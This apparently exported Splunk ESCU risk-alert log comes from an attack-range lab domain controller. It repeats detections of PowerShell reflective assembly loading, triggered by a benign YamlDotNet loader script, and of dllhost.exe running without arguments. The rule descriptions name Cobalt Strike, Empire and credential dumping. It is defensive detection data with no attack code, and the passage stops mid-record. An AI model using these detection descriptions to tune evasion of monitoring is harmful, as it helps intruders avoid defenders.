lastTime="2022-10-03T23:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664844932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T23:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T23:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664844932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T23:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T23:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664838000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664838000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="6836", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664838000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664838000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x1ab4", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664841332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T22:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T22:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664841332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T22:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T22:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664841332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T22:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T22:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664841332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T22:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T22:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may 